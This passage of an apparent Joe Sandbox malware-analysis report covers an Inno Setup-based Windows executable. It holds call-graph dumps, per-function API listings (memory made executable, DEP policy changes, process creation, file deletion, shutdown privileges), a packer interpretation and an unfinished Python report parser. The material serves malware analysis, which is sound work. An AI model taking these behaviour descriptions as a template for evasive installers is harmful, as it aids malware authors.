SetErrorMode 6078->6079 6355 403018 6356 403070 6355->6356 6357 403025 6355->6357 6358 40302a RtlUnwind 6357->6358 6359 40304e 6358->6359 6361 402f78 6359->6361 6362 402be8 6359->6362 6363 402bf1 RaiseException 6362->6363 6364 402c04 6362->6364 6363->6364 6364->6356 6772 409918 6773 409927 6772->6773 6774 40993a 6772->6774 6773->6774 6775 409956 CallWindowProcA 6773->6775 6775->6774 6369 40901e 6370 409010 6369->6370 6371 408fac Wow64RevertWow64FsRedirection 6370->6371 6372 409018 6371->6372 6373 409020 SetLastError 6374 409029 6373->6374 6385 403a28 ReadFile 6386 403a46 6385->6386 6387 403a49 GetLastError 6385->6387 6216 40762c ReadFile 6217 407663 6216->6217 6218 40764c 6216->6218 6219 407652 GetLastError 6218->6219 6220 40765c 6218->6220 6219->6217 6219->6220 6221 40748c 21 API calls 6220->6221 6221->6217 6392 40a02c 6393 409aa0 4 API calls 6392->6393 6394 40a031 6393->6394 6395 40a036 6394->6395 6396 402f24 5 API calls 6394->6396 6397 407918 InterlockedExchange 6395->6397 6396->6395 6398 40a060 6397->6398 6399 40a070 6398->6399 6400 409aa0 4 API calls 6398->6400 6401 4076ac 22 API calls 6399->6401 6400->6399 6402 40a08c 6401->6402 6403 4025ac 4 API calls 6402->6403 6404 40a0c3 6403->6404 6776 40712e 6777 407118 6776->6777 6778 403198 4 API calls 6777->6778 6779 407120 6778->6779 6780 403198 4 API calls 6779->6780 6781 407128 6780->6781 6782 408f30 6785 408dfc 6782->6785 6786 408e05 6785->6786 6787 403198 4 API calls 6786->6787 6788 408e13 6786->6788 6787->6786 6789 403932 6790 403924 6789->6790 6793 40374c 6790->6793 6792 40392c 6794 403766 6793->6794 6795 403759 6793->6795 6794->6792 6795->6794 6796 403779 VariantClear 6795->6796 6796->6792 6027 4075c4 SetFilePointer 6028 4075f7 6027->6028 6029 4075e7 GetLastError 6027->6029 6029->6028 6030 4075f0 6029->6030 6031 40748c 21 API calls 6030->6031 6031->6028 6405 405ac4 6406 405acc 6405->6406 6410 405ad4 6405->6410 6407 405ad2 6406->6407 6408 405adb 6406->6408 6412 405a3c 6407->6412 6409 405930 5 API calls 
6408->6409 6409->6410 6418 405a44 6412->6418 6413 405a5e 6415 405a63 6413->6415 6416 405a7a 6413->6416 6414 403154 4 API calls 6414->6418 6419 405930 5 API calls 6415->6419 6417 403154 4 API calls 6416->6417 6421 405a7f 6417->6421 6418->6413 6418->6414 6420 405a76 6419->6420 6423 403154 4 API calls 6420->6423 6422 4059a0 19 API calls 6421->6422 6422->6420 6424 405aa8 6423->6424 6425 403154 4 API calls 6424->6425 6426 405ab6 6425->6426 6426->6410 6427 4076c8 WriteFile 6428 4076e8 6427->6428 6429 4076ef 6427->6429 6430 40748c 21 API calls 6428->6430 6431 407700 6429->6431 6432 4073ec 20 API calls 6429->6432 6430->6429 6432->6431 6433 40a2ca 6442 4096fc 6433->6442 6436 402f24 5 API calls 6437 40a2d4 6436->6437 6438 403198 4 API calls 6437->6438 6439 40a2f3 6438->6439 6440 403198 4 API calls 6439->6440 6441 40a2fb 6440->6441 6451 40569c 6442->6451 6444 409745 6448 403198 4 API calls 6444->6448 6445 409717 6445->6444 6457 40720c 6445->6457 6447 409735 6450 40973d MessageBoxA 6447->6450 6449 40975a 6448->6449 6449->6436 6450->6444 6452 403154 4 API calls 6451->6452 6454 4056a1 6452->6454 6453 4056b9 6453->6445 6454->6453 6455 403154 4 API calls 6454->6455 6456 4056af 6455->6456 6456->6445 6458 40569c 4 API calls 6457->6458 6459 40721b 6458->6459 6460 407221 6459->6460 6461 40722f 6459->6461 6462 40322c 4 API calls 6460->6462 6463 40723f 6461->6463 6466 40724b 6461->6466 6465 40722d 6462->6465 6468 4071d0 6463->6468 6465->6447 6475 4032b8 6466->6475 6469 40322c 4 API calls 6468->6469 6470 4071df 6469->6470 6471 4071fc 6470->6471 6472 406950 CharPrevA 6470->6472 6471->6465 6473 4071eb 6472->6473 6473->6471 6474 4032fc 4 API calls 6473->6474 6474->6471 6476 403278 4 API calls 6475->6476 6477 4032c2 6476->6477 6477->6465 6478 402ccc 6479 402cdd 6478->6479 6483 402cfe 6478->6483 6480 402d88 RtlUnwind 6479->6480 6482 402b28 RaiseException 6479->6482 6479->6483 6481 403154 4 API calls 6480->6481 6481->6483 6484 402d7f 6482->6484 6484->6480 6805 403fcd 6806 403f07 4 API calls 
6805->6806 6807 403fd6 6806->6807 6808 403e9c 4 API calls 6807->6808 6809 403fe2 6808->6809 5463 4024d0 5464 4024e4 5463->5464 5465 4024f7 5463->5465 5502 401918 RtlInitializeCriticalSection 5464->5502 5467 402518 5465->5467 5468 40250e RtlEnterCriticalSection 5465->5468 5479 402300 5467->5479 5468->5467 5471 4024ed 5473 402525 5476 402581 5473->5476 5477 402577 RtlLeaveCriticalSection 5473->5477 5475 402531 5475->5473 5509 40215c 5475->5509 5477->5476 5480 402314 5479->5480 5481 402335 5480->5481 5482 4023b8 5480->5482 5484 402344 5481->5484 5523 401b74 5481->5523 5482->5484 5487 402455 5482->5487 5526 401d80 5482->5526 5534 401e84 5482->5534 5484->5473 5489 401fd4 5484->5489 5487->5484 5530 401d00 5487->5530 5490 401fe8 5489->5490 5491 401ffb 5489->5491 5492 401918 4 API calls 5490->5492 5493 402012 RtlEnterCriticalSection 5491->5493 5496 40201c 5491->5496 5494 401fed 5492->5494 5493->5496 5494->5491 5495 401ff1 5494->5495 5499 402052 5495->5499 5496->5499 5616 401ee0 5496->5616 5499->5475 5500 402147 5500->5475 5501 40213d RtlLeaveCriticalSection 5501->5500 5503 40193c RtlEnterCriticalSection 5502->5503 5504 401946 5502->5504 5503->5504 5505 401964 LocalAlloc 5504->5505 5506 40197e 5505->5506 5507 4019c3 RtlLeaveCriticalSection 5506->5507 5508 4019cd 5506->5508 5507->5508 5508->5465 5508->5471 5510 40217a 5509->5510 5511 402175 5509->5511 5512 4021ab RtlEnterCriticalSection 5510->5512 5515 4021b5 5510->5515 5519 40217e 5510->5519 5513 401918 4 API calls 5511->5513 5512->5515 5513->5510 5514 4021c1 5517 4022e3 RtlLeaveCriticalSection 5514->5517 5518 4022ed 5514->5518 5515->5514 5516 402244 5515->5516 5521 402270 5515->5521 5516->5519 5520 401d80 7 API calls 5516->5520 5517->5518 5518->5473 5519->5473 5520->5519 5521->5514 5522 401d00 7 API calls 5521->5522 5522->5514 5524 40215c 9 API calls 5523->5524 5525 401b95 5524->5525 5525->5484 5527 401d92 5526->5527 5528 401d89 5526->5528 5527->5482 5528->5527 5529 401b74 9 API calls 5528->5529 5529->5527 5531 401d1e 
5530->5531 5532 401d4e 5530->5532 5531->5484 5532->5531 5539 401c68 5532->5539 5594 401768 5534->5594 5536 401e99 5537 401ea6 5536->5537 5605 401dcc 5536->5605 5537->5482 5540 401c7a 5539->5540 5541 401c9d 5540->5541 5542 401caf 5540->5542 5552 40188c 5541->5552 5543 40188c 3 API calls 5542->5543 5545 401cad 5543->5545 5546 401cc5 5545->5546 5562 401b44 5545->5562 5546->5531 5548 401cd4 5549 401cee 5548->5549 5567 401b98 5548->5567 5572 4013a0 5549->5572 5553 4018b2 5552->5553 5561 40190b 5552->5561 5576 401658 5553->5576 5558 4018e6 5560 4013a0 LocalAlloc 5558->5560 5558->5561 5560->5561 5561->5545 5563 401b52 5562->5563 5564 401b61 5562->5564 5565 401d00 9 API calls 5563->5565 5564->5548 5566 401b5f 5565->5566 5566->5548 5568 401bab 5567->5568 5569 401b9d 5567->5569 5568->5549 5570 401b74 9 API calls 5569->5570 5571 401baa 5570->5571 5571->5549 5573 4013ab 5572->5573 5574 4012e4 LocalAlloc 5573->5574 5575 4013c6 5573->5575 5574->5575 5575->5546 5578 40168f 5576->5578 5577 4016cf 5580 40132c 5577->5580 5578->5577 5579 4016a9 VirtualFree 5578->5579 5579->5578 5581 401348 5580->5581 5588 4012e4 5581->5588 5584 40150c 5586 40153b 5584->5586 5585 401594 5585->5558 5586->5585 5587 401568 VirtualFree 5586->5587 5587->5586 5591 40128c 5588->5591 5592 401298 LocalAlloc 5591->5592 5593 4012aa 5591->5593 5592->5593 5593->5558 5593->5584 5595 401787 5594->5595 5596 40183b 5595->5596 5597 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5595->5597 5599 40132c LocalAlloc 5595->5599 5600 401821 5595->5600 5601 4017d6 5595->5601 5602 4017e7 5596->5602 5612 4015c4 5596->5612 5597->5595 5599->5595 5603 40150c VirtualFree 5600->5603 5604 40150c VirtualFree 5601->5604 5602->5536 5603->5602 5604->5602 5606 401d80 9 API calls 5605->5606 5607 401de0 5606->5607 5608 40132c LocalAlloc 5607->5608 5609 401df0 5608->5609 5610 401b44 9 API calls 5609->5610 5611 401df8 5609->5611 5610->5611 5611->5537 5613 40160a 5612->5613 5614 401626 VirtualAlloc 5613->5614 5615 40163a 5613->5615 
5614->5613 5614->5615 5615->5602 5620 401ef0 5616->5620 5617 401f1c 5618 401d00 9 API calls 5617->5618 5621 401f40 5617->5621 5618->5621 5620->5617 5620->5621 5622 401e58 5620->5622 5621->5500 5621->5501 5627 4016d8 5622->5627 5625 401dcc 9 API calls 5626 401e75 5625->5626 5626->5620 5633 4016f4 5627->5633 5629 4016fe 5630 4015c4 VirtualAlloc 5629->5630 5635 40170a 5630->5635 5631 40175b 5631->5625 5631->5626 5632 40132c LocalAlloc 5632->5633 5633->5629 5633->5631 5633->5632 5634 40174f 5633->5634 5637 401430 5633->5637 5636 40150c VirtualFree 5634->5636 5635->5631 5636->5631 5638 40143f VirtualAlloc 5637->5638 5640 40146c 5638->5640 5641 40148f 5638->5641 5642 4012e4 LocalAlloc 5640->5642 5641->5633 5643 401478 5642->5643 5643->5641 5644 40147c VirtualFree 5643->5644 5644->5641 6485 4028d2 6486 4028da 6485->6486 6487 403554 4 API calls 6486->6487 6488 4028ef 6486->6488 6487->6486 6489 4025ac 4 API calls 6488->6489 6490 4028f4 6489->6490 6810 4019d3 6811 4019ba 6810->6811 6812 4019c3 RtlLeaveCriticalSection 6811->6812 6813 4019cd 6811->6813 6812->6813 6032 407fd4 6033 407fe6 6032->6033 6035 407fed 6032->6035 6043 407f10 6033->6043 6037 408015 6035->6037 6038 408017 6035->6038 6042 408021 6035->6042 6036 40804e 6057 407e2c 6037->6057 6054 407d7c 6038->6054 6039 407d7c 19 API calls 6039->6036 6042->6036 6042->6039 6044 407f25 6043->6044 6045 407d7c 19 API calls 6044->6045 6046 407f34 6044->6046 6045->6046 6047 407f6e 6046->6047 6048 407d7c 19 API calls 6046->6048 6049 407f82 6047->6049 6050 407d7c 19 API calls 6047->6050 6048->6047 6053 407fae 6049->6053 6064 407eb8 6049->6064 6050->6049 6053->6035 6067 4058b4 6054->6067 6056 407d9e 6056->6042 6058 405184 19 API calls 6057->6058 6059 407e57 6058->6059 6075 407de4 6059->6075 6061 407e5f 6062 403198 4 API calls 6061->6062 6063 407e74 6062->6063 6063->6042 6065 407ec7 VirtualFree 6064->6065 6066 407ed9 VirtualAlloc 6064->6066 6065->6066 6066->6053 6068 4058c0 6067->6068 6069 405184 19 API calls 6068->6069 6070 4058ed 
6069->6070 6071 4031e8 4 API calls 6070->6071 6072 4058f8 6071->6072 6073 403198 4 API calls 6072->6073 6074 40590d 6073->6074 6074->6056 6076 4058b4 19 API calls 6075->6076 6077 407e06 6076->6077 6077->6061 6495 40a0d5 6496 40a105 6495->6496 6497 40a10f CreateWindowExA SetWindowLongA 6496->6497 6498 405184 19 API calls 6497->6498 6499 40a192 6498->6499 6500 4032fc 4 API calls 6499->6500 6501 40a1a0 6500->6501 6502 4032fc 4 API calls 6501->6502 6503 40a1ad 6502->6503 6504 406b7c 5 API calls 6503->6504 6505 40a1b9 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1c2 6506->6507 6508 4099a4 29 API calls 6507->6508 6509 40a1d4 6508->6509 6510 409884 5 API calls 6509->6510 6511 40a1e7 6509->6511 6510->6511 6512 40a220 6511->6512 6513 4094d8 9 API calls 6511->6513 6514 40a239 6512->6514 6517 40a233 RemoveDirectoryA 6512->6517 6513->6512 6515 40a242 73A15CF0 6514->6515 6516 40a24d 6514->6516 6515->6516 6518 40a275 6516->6518 6519 40357c 4 API calls 6516->6519 6517->6514 6520 40a26b 6519->6520 6521 4025ac 4 API calls 6520->6521 6521->6518 6080 40a0e7 6081 40a0eb SetLastError 6080->6081 6112 409648 GetLastError 6081->6112 6084 40a105 6086 40a10f CreateWindowExA SetWindowLongA 6084->6086 6085 402f24 5 API calls 6085->6084 6087 405184 19 API calls 6086->6087 6088 40a192 6087->6088 6089 4032fc 4 API calls 6088->6089 6090 40a1a0 6089->6090 6091 4032fc 4 API calls 6090->6091 6092 40a1ad 6091->6092 6125 406b7c GetCommandLineA 6092->6125 6095 4032fc 4 API calls 6096 40a1c2 6095->6096 6130 4099a4 6096->6130 6099 409884 5 API calls 6100 40a1e7 6099->6100 6101 40a220 6100->6101 6102 40a207 6100->6102 6104 40a239 6101->6104 6107 40a233 RemoveDirectoryA 6101->6107 6146 4094d8 6102->6146 6105 40a242 73A15CF0 6104->6105 6106 40a24d 6104->6106 6105->6106 6108 40a275 6106->6108 6154 40357c 6106->6154 6107->6104 6110 40a26b 6111 4025ac 4 API calls 6110->6111 6111->6108 6113 404c84 19 API calls 6112->6113 6114 40968f 6113->6114 6115 407284 5 API calls 6114->6115 6116 40969f 6115->6116 
6117 408da8 4 API calls 6116->6117 6118 4096b4 6117->6118 6119 405880 4 API calls 6118->6119 6120 4096c3 6119->6120 6121 4031b8 4 API calls 6120->6121 6122 4096e2 6121->6122 6123 403198 4 API calls 6122->6123 6124 4096ea 6123->6124 6124->6084 6124->6085 6126 406af0 4 API calls 6125->6126 6127 406ba1 6126->6127 6128 403198 4 API calls 6127->6128 6129 406bbf 6128->6129 6129->6095 6131 4033b4 4 API calls 6130->6131 6132 4099df 6131->6132 6133 409a11 CreateProcessA 6132->6133 6134 409a24 CloseHandle 6133->6134 6135 409a1d 6133->6135 6137 409a2d 6134->6137 6136 409648 21 API calls 6135->6136 6136->6134 6167 409978 6137->6167 6140 409a49 6141 409978 3 API calls 6140->6141 6142 409a4e GetExitCodeProcess CloseHandle 6141->6142 6143 409a6e 6142->6143 6144 403198 4 API calls 6143->6144 6145 409a76 6144->6145 6145->6099 6145->6100 6147 409532 6146->6147 6148 4094eb 6146->6148 6147->6101 6148->6147 6149 4094f3 Sleep 6148->6149 6150 409503 Sleep 6148->6150 6152 40951a GetLastError 6148->6152 6171 408fbc 6148->6171 6149->6148 6150->6148 6152->6147 6153 409524 GetLastError 6152->6153 6153->6147 6153->6148 6155 403591 6154->6155 6163 4035a0 6154->6163 6159 4035d0 6155->6159 6160 40359b 6155->6160 6162 4035b6 6155->6162 6156 4035b1 6161 403198 4 API calls 6156->6161 6157 4035b8 6158 4031b8 4 API calls 6157->6158 6158->6162 6159->6162 6165 40357c 4 API calls 6159->6165 6160->6163 6164 4035ec 6160->6164 6161->6162 6162->6110 6163->6156 6163->6157 6164->6162 6179 403554 6164->6179 6165->6159 6168 40998c PeekMessageA 6167->6168 6169 409980 TranslateMessage DispatchMessageA 6168->6169 6170 40999e MsgWaitForMultipleObjects 6168->6170 6169->6168 6170->6137 6170->6140 6172 408f70 2 API calls 6171->6172 6173 408fd2 6172->6173 6174 408fd6 6173->6174 6175 408ff2 DeleteFileA GetLastError 6173->6175 6174->6148 6176 409010 6175->6176 6177 408fac Wow64RevertWow64FsRedirection 6176->6177 6178 409018 6177->6178 6178->6148 6180 403566 6179->6180 6182 403578 6180->6182 6183 403604 6180->6183 
6182->6164 6184 40357c 6183->6184 6185 4035a0 6184->6185 6189 4035d0 6184->6189 6190 40359b 6184->6190 6192 4035b6 6184->6192 6186 4035b1 6185->6186 6187 4035b8 6185->6187 6191 403198 4 API calls 6186->6191 6188 4031b8 4 API calls 6187->6188 6188->6192 6189->6192 6194 40357c 4 API calls 6189->6194 6190->6185 6193 4035ec 6190->6193 6191->6192 6192->6180 6193->6192 6195 403554 4 API calls 6193->6195 6194->6189 6195->6193 6817 402be9 RaiseException 6818 402c04 6817->6818 6528 402af2 6529 402afe 6528->6529 6532 402ed0 6529->6532 6533 403154 4 API calls 6532->6533 6535 402ee0 6533->6535 6534 402b03 6535->6534 6537 402b0c 6535->6537 6538 402b25 6537->6538 6539 402b15 RaiseException 6537->6539 6538->6534 6539->6538 6819 402dfa 6820 402e26 6819->6820 6821 402e0d 6819->6821 6823 402ba4 6821->6823 6824 402bc9 6823->6824 6825 402bad 6823->6825 6824->6820 6826 402bb5 RaiseException 6825->6826 6826->6824 6827 4075fa GetFileSize 6828 407626 6827->6828 6829 407616 GetLastError 6827->6829 6829->6828 6830 40761f 6829->6830 6831 40748c 21 API calls 6830->6831 6831->6828 6832 406ffb 6833 407008 SetErrorMode 6832->6833 6544 403a80 CloseHandle 6545 403a90 6544->6545 6546 403a91 GetLastError 6544->6546 6547 40a282 6548 40a1f4 6547->6548 6549 4094d8 9 API calls 6548->6549 6551 40a220 6548->6551 6549->6551 6550 40a239 6552 40a242 73A15CF0 6550->6552 6553 40a24d 6550->6553 6551->6550 6554 40a233 RemoveDirectoryA 6551->6554 6552->6553 6555 40a275 6553->6555 6556 40357c 4 API calls 6553->6556 6554->6550 6557 40a26b 6556->6557 6558 4025ac 4 API calls 6557->6558 6558->6555 6559 404283 6560 4042c3 6559->6560 6561 403154 4 API calls 6560->6561 6562 404323 6561->6562 6834 404185 6835 4041ff 6834->6835 6836 4041cc 6835->6836 6837 403154 4 API calls 6835->6837 6838 404323 6837->6838 6563 40a287 6564 40a290 6563->6564 6566 40a2bb 6563->6566 6573 409448 6564->6573 6568 403198 4 API calls 6566->6568 6567 40a295 6567->6566 6570 40a2b3 MessageBoxA 6567->6570 6569 40a2f3 6568->6569 6571 403198 4 API 
calls 6569->6571 6570->6566 6572 40a2fb 6571->6572 6574 409454 GetCurrentProcess OpenProcessToken 6573->6574 6575 4094af ExitWindowsEx 6573->6575 6576 409466 6574->6576 6577 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6574->6577 6575->6576 6576->6567 6577->6575 6577->6576 6578 403e87 6579 403e4c 6578->6579 6580 403e62 6579->6580 6581 403e7b 6579->6581 6582 403e67 6579->6582 6587 403cc8 6580->6587 6583 402674 4 API calls 6581->6583 6585 403e78 6582->6585 6591 402674 6582->6591 6583->6585 6588 403cd6 6587->6588 6589 402674 4 API calls 6588->6589 6590 403ceb 6588->6590 6589->6590 6590->6582 6592 403154 4 API calls 6591->6592 6593 40267a 6592->6593 6593->6585 6598 407e90 6599 407eb8 VirtualFree 6598->6599 6600 407e9d 6599->6600 6847 403991 6848 403983 6847->6848 6849 40374c VariantClear 6848->6849 6850 40398b 6849->6850 6851 405b92 6853 405b94 6851->6853 6852 405bd0 6856 405930 5 API calls 6852->6856 6853->6852 6854 405be7 6853->6854 6855 405bca 6853->6855 6860 404ccc 5 API calls 6854->6860 6855->6852 6857 405c3c 6855->6857 6858 405be3 6856->6858 6859 4059a0 19 API calls 6857->6859 6861 403198 4 API calls 6858->6861 6859->6858 6862 405c10 6860->6862 6863 405c76 6861->6863 6864 4059a0 19 API calls 6862->6864 6864->6858 6603 403e95 6604 403e4c 6603->6604 6605 403e67 6604->6605 6606 403e62 6604->6606 6607 403e7b 6604->6607 6610 403e78 6605->6610 6611 402674 4 API calls 6605->6611 6609 403cc8 4 API calls 6606->6609 6608 402674 4 API calls 6607->6608 6608->6610 6609->6605 6611->6610 6612 403a97 6613 403aac 6612->6613 6614 403bbc GetStdHandle 6613->6614 6615 403b0e CreateFileA 6613->6615 6625 403ab2 6613->6625 6616 403c17 GetLastError 6614->6616 6620 403bba 6614->6620 6615->6616 6617 403b2c 6615->6617 6616->6625 6619 403b3b GetFileSize 6617->6619 6617->6620 6619->6616 6622 403b4e SetFilePointer 6619->6622 6621 403be7 GetFileType 6620->6621 6620->6625 6624 403c02 CloseHandle 6621->6624 6621->6625 6622->6616 6626 403b6a ReadFile 6622->6626 6624->6625 
6626->6616 6627 403b8c 6626->6627 6627->6620 6628 403b9f SetFilePointer 6627->6628 6628->6616 6629 403bb0 SetEndOfFile 6628->6629 6629->6616 6629->6620 6883 4011aa 6884 4011ac GetStdHandle 6883->6884 6222 4076ac SetEndOfFile 6223 4076c3 6222->6223 6224 4076bc 6222->6224 6225 40748c 21 API calls 6224->6225 6225->6223 6633 4028ac 6634 402594 4 API calls 6633->6634 6635 4028b6 6634->6635 6636 401ab9 6637 401a96 6636->6637 6638 401aa9 RtlDeleteCriticalSection 6637->6638 6639 401a9f RtlLeaveCriticalSection 6637->6639 6639->6638

Control-flow Graph

[Graph rendering for the function at 0x409B30 (blocks 0x409B30-0x409BEB) omitted; the page shows it as a flat block-and-edge list. What it shows: GetSystemInfo, then a loop that walks memory from the image base 0x400000 with VirtualQuery and, for the regions it selects, calls VirtualProtect with flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE) at 0x409B84-0x409B95, a nested call to 0x409B28, and a second VirtualProtect at 0x409BB3-0x409BC0. Turning image sections writable and executable in place is what a self-decrypting packer stub does before it overwrites the original sections with the unpacked code.]
                                                                          APIs
                                                                          • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                                          • String ID:
                                                                          • API String ID: 2441996862-0
                                                                          • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                          • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                          • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                          • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                          • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                          • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                          • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                          • API String ID: 3256987805-3653653586
                                                                          • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                          • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                          • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                          • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
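
                                                                          The per-function blocks on this page follow one fixed layout: an `APIs` list (direct calls, plus indented `Part of subcall function` lines for calls made through a callee), a `String ID` field whose values are joined with `$`, then the opcode and fuzzy-hash identifiers. The block below is an added example, not Joe Sandbox code, that parses that layout and tags the behaviours visible in the blocks on this page: runtime resolution of `SetDllDirectoryW`, `SetSearchPathMode` and `SetProcessDEPPolicy` through `GetProcAddress`, the `InnoSetupLdrWindow` and `/SL5=` loader markers, `Wow64*FsRedirection` strings, `CreateProcess*` calls, and an import the IDA plugin could only render as a bare address (`73A15CF0.USER32`). The tag names are this example's own vocabulary; the embedded sample input is two blocks copied from this report with the hash lines the parser does not use left out.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Similarity' blocks (the layout used on
this page) and tag the behaviours an analyst pivots on first.  Added example, not
Joe Sandbox code; the tag vocabulary below is this example's own."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed input: two blocks copied from the report above (unused hash lines left out).
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
Similarity
• API ID: AddressProc$HandleModulePolicyProcess
• String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
• Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67

APIs
• SetLastError.KERNEL32 ref: 0040A0F4
  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02137C50), ref: 0040966C
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
• SetWindowLongA.USER32(00020464,000000FC,00409918), ref: 0040A148
• RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
• 73A15CF0.USER32(00020464,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
Similarity
• API ID: ErrorLastWindow$CreateDirectoryLongRemove
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
"""
# Call line: "GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F"; the argument
# list is optional ("SetLastError.KERNEL32 ref: ...") and an unnamed import is a bare address.
API_RE = re.compile(r"^(?P<api>[0-9A-Za-z_@]+)\.(?P<mod>[A-Z0-9_]+)"
                    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: int                  # call-site address
    via: str | None = None    # callee address when the call is "Part of subcall function"

@dataclass
class Function:
    calls: list[Call] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

def parse_report(text: str) -> list[Function]:
    funcs: list[Function] = []
    cur = None
    for raw in text.splitlines():
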